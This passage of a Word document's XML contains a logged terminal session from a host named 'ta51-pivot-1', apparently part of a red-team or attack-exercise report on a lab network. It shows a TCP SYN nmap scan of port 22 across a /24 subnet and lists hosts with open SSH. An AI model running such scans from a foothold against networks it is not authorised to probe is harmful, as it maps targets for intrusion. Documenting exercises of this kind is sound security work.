        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-pivot-1:~$ date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39473F86" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Fri May 10 10:28:36 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5CC3A8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-pivot-1:~$ sudo nmap -sS -p 22 128.55.12.0/24 (TCP SYN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACAFBEA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082F31D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Starting Nmap 7.01 ( https://nmap.org ) at 2019-05-10 10:28 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15974233" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D34A22" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00072s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CFEF9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E283E25" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E4B854" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 08:00:27:B5:04:07 (Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398052C5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF42AC2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54190A20" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00095s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA6498F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0960EE49" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp closed ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2193E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 08:00:27:94:8D:F4 (Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF5E99" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29CD162F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8D3A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B9711" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F16E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp closed ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BE90CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 08:00:27:D5:CB:86 (Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C61676" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F588EB8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-cadets-1-dp (128.55.12.51)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03683198" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.0026s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F43345D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CAAB3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D89D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:01 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4DDDC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394167D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-test-dp (128.55.12.52)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D389EEF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00056s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203600C8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8B6D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B7387" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:02 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2BF3EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A39F543" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-perf-2-dp (128.55.12.54)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82D238" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00037s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C7A819" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388CDBB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02494226" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:04 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B5CA8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9E835B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-fivedirections-1-dp (128.55.12.55)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E22213C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.0012s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E61D935" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD69AFF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26051330" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:05 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBDD727" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF3CE48" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-fivedirections-2-dp (128.55.12.56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D7534" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.0012s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C60595" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D12015" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8C8AE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:06 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC78936" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE7B9D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-perf-3-dp (128.55.12.57)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D0D25C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00035s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1422CCD2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16184D03" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4F32D3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: D0:67:E5:EC:88:F8 (Dell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D8E1D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A21B09E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-fivedirections-translate-1-dp (128.55.12.58)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7981A58A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00049s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB8A0FB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04B525" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A61EF0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:08 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDB681" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354F3A1F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-starc-1-dp (128.55.12.59)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B758723" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE1552" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B14A8D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729DB623" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:09 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276156DA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4D9FAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-starc-2-dp (128.55.12.60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F33EFC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C4178D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC83311" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5C11E1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:10 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4926C492" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4FFB17" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-starc-3-dp (128.55.12.61)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A608A54" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7A4CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E699EEA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3502666D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:11 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38204155" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48773CA2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-starc-4-dp (128.55.12.62)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215DFC21" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9E3955" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A4653" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738ACD3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:12 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B1038" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB9E798" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-starc-5-dp (128.55.12.63)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF69559" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC5D16" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1BE217" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD890A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:13 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3F01B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F310B4A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta3-starc-6-dp (128.55.12.64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578AF8DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A0E1B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BD0CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
